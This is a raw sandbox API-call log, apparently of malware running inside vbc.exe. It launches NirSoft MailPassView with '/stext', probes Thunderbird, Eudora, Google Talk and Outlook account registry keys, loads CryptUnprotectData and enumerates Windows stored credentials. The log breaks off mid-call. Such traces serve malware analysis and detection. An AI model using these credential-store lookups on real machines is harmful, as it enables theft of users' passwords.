returned="NirSoft Freeware. http://www" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www", _Source=".ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.") returned="NirSoft Freeware. http://www." [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.", _Source="nðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.n") returned="NirSoft Freeware. http://www.n" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.n", _Source="iðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.ni") returned="NirSoft Freeware. http://www.ni" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.ni", _Source="rðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nir") returned="NirSoft Freeware. http://www.nir" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nir", _Source="sðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirs") returned="NirSoft Freeware. http://www.nirs" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nirs", _Source="oðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirso") returned="NirSoft Freeware. http://www.nirso" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nirso", _Source="fðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsof") returned="NirSoft Freeware. http://www.nirsof" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nirsof", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft") returned="NirSoft Freeware. http://www.nirsoft" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft", _Source=".ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.") returned="NirSoft Freeware. http://www.nirsoft." [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.", _Source="nðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.n") returned="NirSoft Freeware. http://www.nirsoft.n" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.n", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.ne") returned="NirSoft Freeware. http://www.nirsoft.ne" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.ne", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.net") returned="NirSoft Freeware. http://www.nirsoft.net" [0138.236] LoadIconA (hInstance=0x400000, lpIconName=0x65) returned 0x1300d7 [0138.237] strncat (in: _Dest="", _Source="Mðú\x19", _Count=0x1 | out: _Dest="M") returned="M" [0138.237] strncat (in: _Dest="M", _Source="aðú\x19", _Count=0x1 | out: _Dest="Ma") returned="Ma" [0138.237] strncat (in: _Dest="Ma", _Source="iðú\x19", _Count=0x1 | out: _Dest="Mai") returned="Mai" [0138.237] strncat (in: _Dest="Mai", _Source="lðú\x19", _Count=0x1 | out: _Dest="Mail") returned="Mail" [0138.238] strncat (in: _Dest="Mail", _Source="Pðú\x19", _Count=0x1 | out: _Dest="MailP") returned="MailP" [0138.238] strncat (in: _Dest="MailP", _Source="aðú\x19", _Count=0x1 | out: _Dest="MailPa") returned="MailPa" [0138.238] strncat (in: _Dest="MailPa", _Source="sðú\x19", _Count=0x1 | out: _Dest="MailPas") returned="MailPas" [0138.238] strncat (in: _Dest="MailPas", _Source="sðú\x19", _Count=0x1 | out: _Dest="MailPass") returned="MailPass" [0138.238] strncat (in: _Dest="MailPass", _Source="Vðú\x19", _Count=0x1 | out: _Dest="MailPassV") returned="MailPassV" [0138.238] strncat (in: _Dest="MailPassV", _Source="iðú\x19", _Count=0x1 | out: _Dest="MailPassVi") returned="MailPassVi" [0138.238] strncat (in: _Dest="MailPassVi", _Source="eðú\x19", _Count=0x1 | out: _Dest="MailPassVie") returned="MailPassVie" [0138.238] strncat (in: _Dest="MailPassVie", _Source="wðú\x19", _Count=0x1 | out: _Dest="MailPassView") returned="MailPassView" [0138.238] _mbscpy (in: param_1=0x19fb5c, param_2=0x19f9ec | out: param_1=0x19fb5c) returned 0x19fb5c [0138.238] strlen (_Str="/stext") returned 0x6 [0138.238] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp") returned 0x34 [0138.238] _strcmpi (_Str1="/savelangfile", _Str2="/stext") returned -1 [0138.238] _strcmpi (_Str1="/savelangfile", _Str2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp") returned -1 [0138.238] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19f9e8, nSize=0x104 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) returned 0x35 [0138.238] _mbscat (in: param_1=0x19f9e8, param_2=0x4141e4 | out: param_1=0x19f9e8) returned 0x19f9e8 [0138.238] GetFileAttributesA (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc_lng.ini" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc_lng.ini")) returned 0xffffffff [0138.238] _strcmpi (_Str1="/deleteregkey", _Str2="/stext") returned -1 [0138.238] _strcmpi (_Str1="/deleteregkey", _Str2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp") returned -1 [0138.238] EnumResourceTypesA (hModule=0x400000, lpEnumFunc=0x40f402, lParam=0x0) returned 1 [0138.238] EnumResourceNamesA (hModule=0x400000, lpType=0x1, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.240] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x1) returned 0x4194d8 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x4194d8) returned 0x134 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x4194d8) returned 0x4196b8 [0138.240] LockResource (hResData=0x4196b8) returned 0x4196b8 [0138.240] EnumResourceNamesA (hModule=0x400000, lpType=0x2, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.240] FindResourceA (hModule=0x400000, lpName=0x68, lpType=0x2) returned 0x4194e8 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x4194e8) returned 0x3e8 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x4194e8) returned 0x4197ec [0138.240] LockResource (hResData=0x4197ec) returned 0x4197ec [0138.240] FindResourceA (hModule=0x400000, lpName=0x85, lpType=0x2) returned 0x4194f8 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x4194f8) returned 0xd8 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x4194f8) returned 0x419bd4 [0138.240] LockResource (hResData=0x419bd4) returned 0x419bd4 [0138.240] FindResourceA (hModule=0x400000, lpName=0x86, lpType=0x2) returned 0x419508 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x419508) returned 0xd8 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x419508) returned 0x419cac [0138.240] LockResource (hResData=0x419cac) returned 0x419cac [0138.240] EnumResourceNamesA (hModule=0x400000, lpType=0x3, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.240] FindResourceA (hModule=0x400000, lpName=0x2, lpType=0x3) returned 0x419518 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x419518) returned 0x2e8 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x419518) returned 0x419d84 [0138.240] LockResource (hResData=0x419d84) returned 0x419d84 [0138.240] FindResourceA (hModule=0x400000, lpName=0x3, lpType=0x3) returned 0x419528 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x419528) returned 0x128 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x419528) returned 0x41a06c [0138.240] LockResource (hResData=0x41a06c) returned 0x41a06c [0138.240] FindResourceA (hModule=0x400000, lpName=0x4, lpType=0x3) returned 0x419538 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x419538) returned 0x128 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x419538) returned 0x41a194 [0138.240] LockResource (hResData=0x41a194) returned 0x41a194 [0138.240] EnumResourceNamesA (hModule=0x400000, lpType=0x4, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.240] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0x4) returned 0x419548 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x419548) returned 0x38c [0138.240] LoadResource (hModule=0x400000, hResInfo=0x419548) returned 0x41a2bc [0138.240] LockResource (hResData=0x41a2bc) returned 0x41a2bc [0138.240] FindResourceA (hModule=0x400000, lpName=0x68, lpType=0x4) returned 0x419558 [0138.240] SizeofResource (hModule=0x400000, hResInfo=0x419558) returned 0x1f2 [0138.240] LoadResource (hModule=0x400000, hResInfo=0x419558) returned 0x41a648 [0138.240] LockResource (hResData=0x41a648) returned 0x41a648 [0138.241] EnumResourceNamesA (hModule=0x400000, lpType=0x5, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.241] FindResourceA (hModule=0x400000, lpName=0x69, lpType=0x5) returned 0x419568 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x419568) returned 0xa2 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x419568) returned 0x41a83c [0138.241] LockResource (hResData=0x41a83c) returned 0x41a83c [0138.241] FindResourceA (hModule=0x400000, lpName=0x6b, lpType=0x5) returned 0x419578 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x419578) returned 0x296 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x419578) returned 0x41a8e0 [0138.241] LockResource (hResData=0x41a8e0) returned 0x41a8e0 [0138.241] FindResourceA (hModule=0x400000, lpName=0x6c, lpType=0x5) returned 0x419588 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x419588) returned 0x364 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x419588) returned 0x41ab78 [0138.241] LockResource (hResData=0x41ab78) returned 0x41ab78 [0138.241] FindResourceA (hModule=0x400000, lpName=0x70, lpType=0x5) returned 0x419598 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x419598) returned 0xfa [0138.241] LoadResource (hModule=0x400000, hResInfo=0x419598) returned 0x41aedc [0138.241] LockResource (hResData=0x41aedc) returned 0x41aedc [0138.241] FindResourceA (hModule=0x400000, lpName=0x448, lpType=0x5) returned 0x4195a8 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x4195a8) returned 0x336 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x4195a8) returned 0x41afd8 [0138.241] LockResource (hResData=0x41afd8) returned 0x41afd8 [0138.241] EnumResourceNamesA (hModule=0x400000, lpType=0x6, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.241] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x6) returned 0x4195b8 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x4195b8) returned 0x1f2 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x4195b8) returned 0x41b310 [0138.241] LockResource (hResData=0x41b310) returned 0x41b310 [0138.241] FindResourceA (hModule=0x400000, lpName=0x2, lpType=0x6) returned 0x4195c8 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x4195c8) returned 0x24 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x4195c8) returned 0x41b504 [0138.241] LockResource (hResData=0x41b504) returned 0x41b504 [0138.241] FindResourceA (hModule=0x400000, lpName=0x20, lpType=0x6) returned 0x4195d8 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x4195d8) returned 0x13a [0138.241] LoadResource (hModule=0x400000, hResInfo=0x4195d8) returned 0x41b528 [0138.241] LockResource (hResData=0x41b528) returned 0x41b528 [0138.241] FindResourceA (hModule=0x400000, lpName=0x21, lpType=0x6) returned 0x4195e8 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x4195e8) returned 0x3e [0138.241] LoadResource (hModule=0x400000, hResInfo=0x4195e8) returned 0x41b664 [0138.241] LockResource (hResData=0x41b664) returned 0x41b664 [0138.241] FindResourceA (hModule=0x400000, lpName=0x33, lpType=0x6) returned 0x4195f8 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x4195f8) returned 0x48 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x4195f8) returned 0x41b6a4 [0138.241] LockResource (hResData=0x41b6a4) returned 0x41b6a4 [0138.241] FindResourceA (hModule=0x400000, lpName=0x39, lpType=0x6) returned 0x419608 [0138.241] SizeofResource (hModule=0x400000, hResInfo=0x419608) returned 0x134 [0138.241] LoadResource (hModule=0x400000, hResInfo=0x419608) returned 0x41b6ec [0138.241] LockResource (hResData=0x41b6ec) returned 0x41b6ec [0138.241] FindResourceA (hModule=0x400000, lpName=0x3a, lpType=0x6) returned 0x419618 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419618) returned 0xa6 [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419618) returned 0x41b820 [0138.242] LockResource (hResData=0x41b820) returned 0x41b820 [0138.242] FindResourceA (hModule=0x400000, lpName=0x3f, lpType=0x6) returned 0x419628 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419628) returned 0x74 [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419628) returned 0x41b8c8 [0138.242] LockResource (hResData=0x41b8c8) returned 0x41b8c8 [0138.242] FindResourceA (hModule=0x400000, lpName=0x40, lpType=0x6) returned 0x419638 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419638) returned 0xaa [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419638) returned 0x41b93c [0138.242] LockResource (hResData=0x41b93c) returned 0x41b93c [0138.242] FindResourceA (hModule=0x400000, lpName=0x52, lpType=0x6) returned 0x419648 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419648) returned 0x68 [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419648) returned 0x41b9e8 [0138.242] LockResource (hResData=0x41b9e8) returned 0x41b9e8 [0138.242] EnumResourceNamesA (hModule=0x400000, lpType=0x9, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.242] FindResourceA (hModule=0x400000, lpName=0x67, lpType=0x9) returned 0x419658 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419658) returned 0x50 [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419658) returned 0x41ba50 [0138.242] LockResource (hResData=0x41ba50) returned 0x41ba50 [0138.242] EnumResourceNamesA (hModule=0x400000, lpType=0xc, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.242] FindResourceA (hModule=0x400000, lpName=0x67, lpType=0xc) returned 0x419668 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419668) returned 0x14 [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419668) returned 0x41baa0 [0138.242] LockResource (hResData=0x41baa0) returned 0x41baa0 [0138.242] EnumResourceNamesA (hModule=0x400000, lpType=0xe, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.242] FindResourceA (hModule=0x400000, lpName=0x65, lpType=0xe) returned 0x419678 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419678) returned 0x22 [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419678) returned 0x41bab4 [0138.242] LockResource (hResData=0x41bab4) returned 0x41bab4 [0138.242] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0xe) returned 0x419688 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419688) returned 0x14 [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419688) returned 0x41bad8 [0138.242] LockResource (hResData=0x41bad8) returned 0x41bad8 [0138.242] EnumResourceNamesA (hModule=0x400000, lpType=0x10, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.242] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x10) returned 0x419698 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x419698) returned 0x26c [0138.242] LoadResource (hModule=0x400000, hResInfo=0x419698) returned 0x41baec [0138.242] LockResource (hResData=0x41baec) returned 0x41baec [0138.242] EnumResourceNamesA (hModule=0x400000, lpType=0x18, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0138.242] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x18) returned 0x4196a8 [0138.242] SizeofResource (hModule=0x400000, hResInfo=0x4196a8) returned 0x16a [0138.242] LoadResource (hModule=0x400000, hResInfo=0x4196a8) returned 0x41bd58 [0138.243] LockResource (hResData=0x41bd58) returned 0x41bd58 [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Name") returned 0x4 [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Name") returned 0x4 [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Application") returned 0xb [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Application") returned 0xb [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Email") returned 0x5 [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Email") returned 0x5 [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Server") returned 0x6 [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Server") returned 0x6 [0138.243] LoadStringA (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Server Port") returned 0xb [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Server Port") returned 0xb [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Secured") returned 0x7 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Secured") returned 0x7 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Type") returned 0x4 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Type") returned 0x4 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="User") returned 0x4 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="User") returned 0x4 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Profile") returned 0x7 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Profile") returned 0x7 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f3, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f3, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f4, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="SMTP Server") returned 0xb [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f4, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="SMTP Server") returned 0xb [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f5, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="SMTP Server Port") returned 0x10 [0138.244] LoadStringA (in: hInstance=0x400000, uID=0x3f5, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="SMTP Server Port") returned 0x10 [0138.245] GetVersionExA (in: lpVersionInformation=0x418118*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x418118*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0138.245] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x19f8c4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0138.249] strlen (_Str="Mozilla\\Profiles") returned 0x10 [0138.249] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0138.249] _mbscpy (in: param_1=0x8a3068, param_2=0x19f8c4 | out: param_1=0x8a3068) returned 0x8a3068 [0138.249] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0138.249] _mbscat (in: param_1=0x8a3068, param_2=0x414078 | out: param_1=0x8a3068) returned 0x8a3068 [0138.249] _mbscat (in: param_1=0x8a3068, param_2=0x413488 | out: param_1=0x8a3068) returned 0x8a3068 [0138.249] GetFileAttributesA (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Profiles" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\profiles")) returned 0xffffffff [0138.249] strlen (_Str="Thunderbird\\Profiles") returned 0x14 [0138.249] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0138.249] _mbscpy (in: param_1=0x8a316d, param_2=0x19f8c4 | out: param_1=0x8a316d) returned 0x8a316d [0138.249] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0138.249] _mbscat (in: param_1=0x8a316d, param_2=0x414078 | out: param_1=0x8a316d) returned 0x8a316d [0138.249] _mbscat (in: param_1=0x8a316d, param_2=0x41349c | out: param_1=0x8a316d) returned 0x8a316d [0138.249] GetFileAttributesA (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Thunderbird\\Profiles" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\thunderbird\\profiles")) returned 0xffffffff [0138.249] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Qualcomm\\Eudora\\CommandLine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f190 | out: phkResult=0x19f190*=0x0) returned 0x2 [0138.249] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f190 | out: phkResult=0x19f190*=0x0) returned 0x2 [0138.250] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Thunderbird", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fad8 | out: phkResult=0x19fad8*=0x0) returned 0x2 [0138.250] ExpandEnvironmentStringsA (in: lpSrc="%programfiles%\\Mozilla Thunderbird", lpDst=0x8a3377, nSize=0x104 | out: lpDst="C:\\Program Files (x86)\\Mozilla Thunderbird") returned 0x2b [0138.250] GetFileAttributesA (lpFileName="C:\\Program Files (x86)\\Mozilla Thunderbird" (normalized: "c:\\program files (x86)\\mozilla thunderbird")) returned 0xffffffff [0138.250] _strcmpi (_Str1="/stext", _Str2="/stext") returned 0 [0138.250] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19f7bc, nSize=0x104 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) returned 0x35 [0138.250] _mbscat (in: param_1=0x19f7bc, param_2=0x414450 | out: param_1=0x19f7bc) returned 0x19f7bc [0138.250] _mbscpy (in: param_1=0x19f8cc, param_2=0x19f7bc | out: param_1=0x19f8cc) returned 0x19f8cc [0138.250] _mbscpy (in: param_1=0x19f9d1, param_2=0x414458 | out: param_1=0x19f9d1) returned 0x19f9d1 [0138.250] GetPrivateProfileIntA (lpAppName="General", lpKeyName="ShowGridLines", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0138.250] GetPrivateProfileIntA (lpAppName="General", lpKeyName="SaveFilterIndex", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0138.250] GetPrivateProfileIntA (lpAppName="General", lpKeyName="AddExportHeaderLine", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0138.250] GetPrivateProfileIntA (lpAppName="General", lpKeyName="MarkOddEvenRows", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0138.250] GetPrivateProfileStringA (in: lpAppName="General", lpKeyName="WinPos", lpDefault="", lpReturnedString=0x19d77c, nSize=0x2000, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0138.250] strlen (_Str="") returned 0x0 [0138.250] GetPrivateProfileStringA (in: lpAppName="General", lpKeyName="Columns", lpDefault="", lpReturnedString=0x19d76c, nSize=0x2000, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg" | out: lpReturnedString="") returned 0x0 [0138.250] strlen (_Str="") returned 0x0 [0138.251] GetPrivateProfileIntA (lpAppName="General", lpKeyName="Sort", nDefault=0, lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.cfg") returned 0x0 [0138.251] _mbsicmp (_Str1=0x4143d4, _Str2=0x8a3638) returned -1 [0138.251] _mbsicmp (_Str1=0x4143d4, _Str2=0x8a363f) returned -1 [0138.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0138.251] SetCursor (hCursor=0x10007) returned 0x10007 [0138.251] LoadLibraryA (lpLibFileName="pstorec.dll") returned 0x73110000 [0138.253] GetProcAddress (hModule=0x73110000, lpProcName="PStoreCreateInstance") returned 0x73111290 [0138.253] PStoreCreateInstance () returned 0x80004001 [0138.253] FreeLibrary (hLibModule=0x73110000) returned 1 [0138.253] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x76680000 [0138.635] GetProcAddress (hModule=0x76680000, lpProcName="CryptUnprotectData") returned 0x766caf50 [0138.635] GetComputerNameA (in: lpBuffer=0x19e86c, nSize=0x19e978 | out: lpBuffer="LHNIWSJ", nSize=0x19e978) returned 1 [0138.635] GetUserNameA (in: lpBuffer=0x19e76c, pcbBuffer=0x19e978 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0x19e978) returned 1 [0138.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19e86c, cbMultiByte=-1, lpWideCharStr=0x19e36c, cchWideChar=255 | out: lpWideCharStr="LHNIWSJ") returned 8 [0138.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19e76c, cbMultiByte=-1, lpWideCharStr=0x19e56c, cchWideChar=255 | out: lpWideCharStr="CIiHmnxMn6Ps") returned 13 [0138.638] strlen (_Str="LHNIWSJ") returned 0x7 [0138.638] strlen (_Str="CIiHmnxMn6Ps") returned 0xc [0138.638] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Google\\Google Talk\\Accounts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e9a4 | out: phkResult=0x19e9a4*=0x0) returned 0x2 [0138.638] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Google\\Google Desktop\\Mailboxes", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f9a8 | out: phkResult=0x19f9a8*=0x0) returned 0x2 [0138.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74c60000 [0138.638] GetProcAddress (hModule=0x74c60000, lpProcName="CredReadA") returned 0x74c958f0 [0138.638] GetProcAddress (hModule=0x74c60000, lpProcName="CredFree") returned 0x74c84010 [0138.638] GetProcAddress (hModule=0x74c60000, lpProcName="CredDeleteA") returned 0x74c956b0 [0138.639] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateA") returned 0x74c95710 [0138.639] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateW") returned 0x74c83950 [0138.639] CredEnumerateW (in: Filter=0x0, Flags=0x0, Count=0x19f618, Credential=0x19f614 | out: Count=0x19f618, Credential=0x19f614) returned 0 [0138.640] FreeLibrary (hLibModule=0x74c60000) returned 1 [0138.640] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Account Manager\\Accounts", ulOptions=0x0, samDesired=0x20019, 